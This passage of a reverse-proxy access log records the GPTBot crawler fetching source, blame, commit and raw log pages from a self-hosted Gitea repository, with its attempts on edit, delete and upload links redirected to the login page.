"/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11598] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13335] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12048] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:14:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor" -[17/Feb/2026:16:14:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor" -[17/Feb/2026:16:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 30494] [Gzip 11.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:14:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor" -[17/Feb/2026:16:14:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/ReadMe.md" -[17/Feb/2026:16:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13899] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor" [Client 74.7.227.38] [Length 9774] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12721] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 141941] [Gzip 26.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 550901] [Gzip 22.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 64222] [Gzip 18.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 40430] [Gzip 16.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13924] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:16:14:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9789] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9799] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 876] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13603] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11996] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11293] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13924] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:16:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 11117] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 10516] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10695] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 10695] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 10516] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 923896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/tempCodeRunnerFile.py" -[17/Feb/2026:16:14:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 3774907] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 310973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 159348] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 21922] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 24188] [Gzip 5.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 19086] [Gzip 3.43] [Sent-to 